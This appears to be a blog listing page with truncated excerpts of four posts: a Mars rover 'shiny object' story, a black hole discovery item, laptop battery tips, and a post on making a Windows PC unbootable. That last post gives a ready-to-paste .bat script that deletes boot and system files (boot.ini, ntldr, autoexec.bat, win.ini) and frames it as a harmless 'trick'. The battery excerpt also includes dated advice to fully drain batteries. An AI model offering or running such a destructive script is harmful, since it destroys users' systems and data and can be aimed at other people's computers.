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NASA's Curiosity finds unidentified shiny object on Mars surface

 NASA’s Curiosity Rover which had been sent to Red planet for searching the chances of life, and similarities between Earth and Mars, now has found some more interesting things on Mars. Curiosity found some unidentified shiny object on the surface, while collecting the samples of Red Planet’s surface. Rover has found some enough shiny object on the surface of Mars, which can be clearly seen by the pictures sent by Curiosity Rover to NASA. Scientists have different opinions for these shiny unidentified objects, some scientists are taking these objects as some human-made material/object, while other scientist are assuming it as a part of the Red planet itself. After seeing these shiny objects, NASA stated on Wednesday, that Curiosity Rover’s Chemin, which is a special device to check chemical and biological materials, will do more inspection of Mars’s surface to find the truth. Scientists who are related to Curiosity’s project in California, finally declared that they have...

How to Shut Down a Windows running Computer forever.

Introduction: This post shares some .bat script with you, which can be used as a trick , so that one will Shut Down his/her Computer, and will never be able to turn it ON, until he/she install a new copy of Windows or any other Operating System . In this trick, you will create a .bat file , which when clicked, immediately shuts down your Computer and when the next time you will try to turn ON your Computer, you’ll find it not possible. Software needed for creating a file to shut down your PC forever-   Notepad.. and just Notepad or any other good text editor. ·          Nothing else! So here it starts: 1) Open Notepad . 2) Now, copy/paste the following code into it: @echo off attrib –r –s –h c:\autoexec.bat del c:\autoexec.bat attrib –r –s –h c:\boot.ini del c:\boot.ini attrib –r –s –h c:\ntldr del c:\ntldr attrib –r –s –h c:\windows\win.ini del c:\windows\win.ini 3) Now simpl...

NASA’s Swift satellite found signs of a new Black Hole in Milky Way galaxy. Swift J 1745.26

America’s Space agency  NASA’s Swift satellite  has found the signs of an  unknown black hole  in our  Milky Way . Space scientists have no idea about its real distance from our planet, but they are believing as it is on a distance of 20 to 30 thousand light years away from the inner space of our Milky Way. It has been reported that this Black Hole has been came into vision due to the light of a  Bright X-ray Nova . The Head Researcher of this project,   Neil Gehrels said  that ‘such lightning X-ray Nova are rare to be seen, and this the only such  X-ray Nova,  which Swift has captured. Actually, we were waiting for the same’. A scientist,  Borris Baruffati  has shown his hope that as the effects of this X-ray Nova will get decreased, we will be able to clear if it is really a Black Hole or not, but knowing its mass. What is a Black Hole? Black hole  is that place in the space, from where ...

How to maintain Laptop's battery - increase battery life and battery performance.

Introduction: This post deals with some useful steps on how to maintain our Laptop’s battery , so that it may last for longer time . It is not only useful to save your future expenses to buy a new battery after every third month, but also as it saves you from the trouble of losing useful data due to sudden shut down of Laptop. Now, I am going to share some useful tips that may help you to maintain your Laptop battery in a good condition. Tip 1: If you have just bought a new battery for your Laptop, charge the battery fully before taking it into use. Tip 2: Do not bother if your new battery is not giving a good back-up , get it fully charged and discharged a couple of times so that it can give full of it. Tip 3: Fully charge and fully drain your battery after every couple of months. It may help in maintaining the battery performance . Tip 4:   Re-chargeable batteries often undergoes self-discharging when not kept in use for longer time. Hence, always ...